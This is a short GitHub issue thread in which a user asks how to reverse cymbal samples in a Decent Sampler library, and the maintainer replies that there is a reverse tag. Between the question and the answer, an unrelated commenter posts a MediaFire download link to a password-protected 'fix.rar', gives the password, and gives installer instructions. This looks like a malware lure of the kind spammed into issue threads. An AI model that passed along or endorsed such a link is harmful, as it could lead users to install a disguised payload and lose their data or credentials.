### ISSUE TITLE
QUESTION: reversing samples

### ISSUE THREAD

**Issue by mxdpeep** [git-moss/ConvertWithMoss#44]
Hi, I need a tip what's the best way to reverse samples in Decent Sampler library (like cymbals). 😂

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by git-moss** [comment]
Use the reverse tag.
